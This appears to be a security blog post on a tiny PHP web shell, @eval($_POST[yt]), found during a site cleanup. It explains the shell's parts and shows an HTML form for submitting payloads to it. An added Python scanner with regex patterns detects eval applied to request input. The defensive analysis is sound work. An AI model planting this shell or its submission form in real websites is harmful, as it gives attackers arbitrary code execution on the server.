PHP is a general-purpose server-side scripting language that provides a very rich arsenal for web development.
As part of that arsenal, PHP provides broad capabilities for developing generic shells that can run on almost every website.
During a recent website malware cleanup we detected a generic shell that occupied only 18 characters. The following is the code of this shell, which is capable of executing any arbitrary malicious content submitted by attackers.
This shell has three major parts:
- @ - the PHP error control operator, which makes the PHP interpreter ignore any error that occurs (http://php.net/manual/en/language.operators.errorcontrol.php)
- eval - evaluates a string as PHP code, allowing execution of arbitrary PHP code provided as an input string
- $_POST[yt] - the actual shell payload submitted by the attacker
The following is an example of the HTML-side code used to submit the shell payload:
<form action="/action_post.php" method="post">
shell: <input type="text" name="yt">
<input type="submit" value="Submit">
</form>
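For cleanup work, the three parts listed above translate directly into a search pattern. The following is an added example, not code from the original post: a small scanner that flags eval() applied directly to request input, generalized beyond the post's case to the other request superglobals, to missing @, and to tokens split by whitespace or block comments. The function names and the sample file are hypothetical and constructed for illustration.

```python
import re
from pathlib import Path

# /* ... */ comments can be used to split the tokens apart, so blank them out
# (newlines are kept so reported line numbers stay correct).
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# eval() applied directly to request data, with or without the @ operator.
# eval is case-insensitive in PHP; superglobal names are not.
_EVAL_OF_INPUT = re.compile(
    r"(?P<at>@\s*)?\b(?i:eval)\s*\(\s*"
    r"\$_(?P<src>POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]?(?P<key>\w+)"
)

def find_eval_of_request_input(php_source):
    """Return [(line, superglobal, key, error_suppressed), ...]."""
    cleaned = _BLOCK_COMMENT.sub(
        lambda m: re.sub(r"[^\n]", " ", m.group(0)), php_source)
    hits = []
    for m in _EVAL_OF_INPUT.finditer(cleaned):
        line = cleaned.count("\n", 0, m.start()) + 1
        hits.append((line, m.group("src"), m.group("key"),
                     m.group("at") is not None))
    return hits

def scan_tree(root):
    """Scan every *.php file under root and return {path: hits}."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = find_eval_of_request_input(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample file (not taken from a real site).
SAMPLE = """<?php
echo "hello";
@eval($_POST[yt]);
EVAL /* split */ ( $_REQUEST['c'] );
$x = eval('return 1;');
medieval($_POST[a]);
"""

if __name__ == "__main__":
    for hit in find_eval_of_request_input(SAMPLE):
        print(hit)
```

This pattern only covers eval called directly on a superglobal; encoded or indirect variants need additional rules, so a clean result means only that this one form is absent.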